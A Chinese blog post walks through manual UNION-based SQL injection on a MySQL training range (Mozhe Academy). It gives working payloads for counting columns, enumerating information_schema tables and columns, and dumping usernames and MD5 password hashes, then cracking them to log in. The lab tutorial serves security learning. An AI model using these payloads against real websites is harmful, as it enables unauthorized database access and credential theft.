墨者:SQL手工注入漏洞测试(MySQL数据库)

看天走路吃雪糕2025-07-28 14:53

一、SQL手工注入漏洞测试(MySQL数据库)

本文以墨者学院靶场为例,演示MySQL数据库的手工SQL注入全过程。靶场以自己的地址为准:http://124.70.64.48:47777/new_list.php?id=1

二、注入原理与流程(如下指令去掉了id之前的内容)

MySQL手工注入主要通过闭合SQL语句、联合查询系统表来获取敏感信息。以下是完整的攻击流程:

1. 判断字段数

sql 复制代码 
id=1 order by 5
  • 作用:确定SELECT查询返回的列数
  • 原理 :通过递增order by后的数字,当页面报错时说明超出实际字段数
  • 示例 :若order by 4正常但order by 5报错,说明有4个字段

2. 确定回显位置

sql 复制代码 
id=-1 union select 1,2,3,4
  • 关键点
    • id=-1使原查询无结果
    • union select强制返回我们的数据
    • 页面显示的数字即为可回显的列位置
  • 输出 :假设页面显示23,则后续注入用这两个位置

3. 获取数据库信息

sql 复制代码 
id=-1 union select 1,group_concat(database()),3,4
  • 函数说明
    • database():当前数据库名称
    • group_concat():多行结果合并为字符串
  • 典型返回mozhe_Discuz_StormGroup

4. 枚举数据表

sql 复制代码 
id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
  • 系统表说明
    • information_schema.tables:存储所有表信息
    • table_schema:过滤指定数据库的表
  • 输出示例StormGroup_member,notice,...

5. 获取字段结构

sql 复制代码 
id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
  • 系统表说明
    • information_schema.columns:存储列定义信息
    • table_name:指定目标表
  • 返回结果id,name,password,status,...

6. 提取账号密码

sql 复制代码 
id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

  • 实战技巧

    • 使用group_concat()合并所有记录
    • ,分隔不同字段(如admin,user1123456,qwerty

  • 数据示例

    复制代码 
    用户名:mozhe,admin,...
密码:5f4dcc3b5aa765d61d8327deb882cf99,098f6bcd4621d373cade4e832627b4f6,...

7. MD5解密后,手动登录,获取Key

MD5工具地址:https://www.cmd5.com/

三、关键指令速查表

指令/函数 作用 MySQL特性说明
order by N 判断字段数 报错法最可靠
union select 联合查询 前后列数必须相同
database() 当前数据库名 等价于schema()
group_concat() 行转字符串 默认逗号分隔
information_schema 元数据库 存储所有表/列定义
table_schema 过滤数据库 值需加引号
table_name 过滤表名 区分大小写
相关推荐
Navicat中国3 小时前
Navicat x 达梦技术指引 | 数据字典
数据库·达梦·可视化·navicat·数据字典
running up3 小时前
Spring核心深度解析:AOP与事务管理(TX)全指南
java·数据库·spring
一水鉴天3 小时前
整体设计 定稿 之6 完整设计文档讨论及定稿 之1(豆包周助手)
java·前端·数据库
倔强的石头_4 小时前
金仓数据库(KingbaseES) 开发实战:常见迁移挑战与技术解析
数据库
编程小白gogogo4 小时前
苍穹外卖后端环境搭建-数据库环境搭建
数据库
星哥说事4 小时前
基于 MySQL Monitoring and Management 的性能保障实践
数据库·mysql
此生只爱蛋4 小时前
【Redis】列表List类型
数据库·redis·缓存
Jaising6664 小时前
Mybatis Plus 主键生成器实现思路分析
数据库·spring boot·mybatis
程序喵大人4 小时前
SQLITE问题整理
开发语言·数据库·c++·sqlite
菜鸟小九4 小时前
redis实战(缓存)
数据库·redis·缓存
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05Neo4j(一) - Neo4j安装教程(Windows)06【AutoGLM部署】本地私有化部署AI手机Agent07Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser08Open-AutoGLM Windows 安装部署教程09安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)10BongoCat - 跨平台键盘猫动画工具